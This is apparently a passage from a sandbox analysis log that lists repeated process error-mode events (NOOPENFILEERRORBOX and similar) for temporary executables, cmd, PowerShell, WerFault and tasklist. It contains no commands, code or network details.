                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
